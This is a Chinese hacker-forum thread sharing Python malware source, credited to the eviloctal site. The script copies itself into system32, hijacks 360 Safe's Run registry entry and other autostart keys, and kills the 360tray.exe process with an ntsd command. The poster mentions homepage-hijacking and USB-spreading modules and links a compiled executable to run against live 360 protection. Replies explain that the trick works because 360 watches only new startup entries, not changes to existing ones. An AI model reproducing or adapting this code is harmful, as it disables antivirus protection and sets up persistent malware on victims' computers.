文章作者：吴杰
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

Code Language : Python

1. import _winreg
2. import os
3. import shutil
4.  
5. #复制自身
6. shutil.copyfile('K3.exe','c:\WINDOWS\system32\K3.exe')
7.  
8. #把360启动改为自身
9. run = _winreg.OpenKey(
10.   _winreg.HKEY_LOCAL_MACHINE,
11.   \"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\",0,_winreg.KEY_WRITE
12.  )
13.  
14. _winreg.SetValueEx(
15.  run,\"360Safetray\",0,_winreg.REG_SZ,
16.  r\"C:\WINDOWS\system32\k3.exe\"
17.  )
18.  
19. #添加自启动
20. self = _winreg.OpenKey(
21.  _winreg.HKEY_LOCAL_MACHINE,
22.  \"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\",0,_winreg.KEY_WRITE
23.  )
24.  
25. _winreg.SetValueEx(
26.  run,\"k3\",0,_winreg.REG_SZ,
27.  r\"C:\WINDOWS\system32\k3.exe\"
28.  )
29. #添加所有用户启动
30. allrun = _winreg.OpenKey(
31.  _winreg.HKEY_LOCAL_MACHINE,
32.  \"Microsoft\Windows\CurrentVersion\policies\Explorer\Run\",0,_winreg.KEY_WRITE
33.  )
34. _winreg.SetValueEx(
35.  allrun,\"k3\",0,_winreg.REG_SZ,
36.  r\"C:\WINDOWS\system32\k3.exe\"
37.  )
38.  
39. #终止360进程
40. os.popen(\"ntsd -c q -pn 360tray.exe cmd\")

Parsed in 0.010 seconds

ntsd -c q -pn 360tray.exe cmd

很好,很强大.

弱弱问下,LZ用的什么语言啊?
俺怎么从来木有见过捏.
----------------------------------
原来是python语言... 从来木听说过.

我只是把杀360的部分程序拿出来了，还一部份是修改首页和U盘传播的部分，有空发来
终止360进程那个部分，在程序中试了很多命令都不能结束它，最后google 找到了这个。

汗,360又不是恶意软件,它没有保护自己进程呀.随便怎么样都可以结束掉的啊.

R3的TerminateProcess就可以结束掉了.别说通过job、PspTerminateThreadByPointer等了。。。
----------------------------------------------------------------------------------------------------------------------------------
修改首页
不知道有多邪恶呢, 如同cnnic反复更改注册表,FSD INLINE HOOK之类的呀?
U盘传播
呵呵,U盘小偷之类的程序很多,R3 或者R0下都可以实现.R3下方便点儿

从头到尾，还是debug attach再XX，不够邪恶...

我从来没有用过360所以有一个问题想问一下：难道360没有Hook NtSetValueKey ？

引用:

引用第5楼delphiscn于2008-01-27 16:51发表的 :
我从来没有用过360所以有一个问题想问一下：难道360没有Hook NtSetValueKey ？

做注册表监控的,一般都会HOOK 掉NtSetValueKey ,但一般只对关键的地方进行判断处理,其他无视的地方直接放行.

俺机器上有微点,所以被它HOOK了,看不到360驱动的痕迹.

--------------------------------------------------------------------------------


综上,LZ的这些科普代码一点作用都没有 (LZ不要生气啊,俺实事求是的说) -->

#把360启动改为自身
run = _winreg.OpenKey(
   _winreg.HKEY_LOCAL_MACHINE,
   "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE
   )

_winreg.SetValueEx(
   run,"360Safetray",0,_winreg.REG_SZ,
   r"C:\WINDOWS\system32\k3.exe"
   )

这能成功俺一个月不碰内核了!

回楼上的，你准备一个月不碰内核吧，我可以打包成EXE让你试下，如果没成功我怎敢到这里来胡说八道

我就不用试了.这点不能称为技术的东西N年前就搞过了. 开着360的监控能这样过那就太牛B了...

小大小闹犯不着拿到俺这个菜鸟面前炫耀...,

在内核群帖了这个帖子.反映不错

没有鄙夷你的意思.只是觉得这样称不上技术的技术发出来闹闹还行,没想你还认真了.

看俺最后能不能一个月内不碰内核.

http://www.wujie.name/K3.exe
这个是下载地址
开着360监控执行即可
虽然我知道这个方法称不上“技术”，但是我的目标就是结束360的进程和不让它自动启动，至于用多高深的办法我不管，请你们不要鄙视我这个菜鸟，谢谢。

原来你是钻了360注册表监控的空子, 360 好像只对新增的关键位置的启动项作出拦截.对修改已有项不会有反映..

理解的方向不同呀. 早些时候xyreg牛用的HIVE的方法过注册表监控测试是新增项,而不是修改已有项....

没有人会鄙视你,也没有资格鄙视任何人。就事论事.和谐社会,和谐论坛.共同讨论,共同提高

LS的不做试验不仔细看就说一个月不碰内核,这下囧了吧.说话考虑下别人的感受再说吧...
还有那个群里的那位,骂别人SB的时候不知道自己是不是仔细看过帖子.
我看帖子标题清晰,内容明确,虽然这帖子都算不上技术帖,可是毕竟是360的一个小bug,是LZ研究的结果,值得尊重.

乱评价的人拿出自己的代码来不就得了。光张个嘴巴乱指点别人没说服力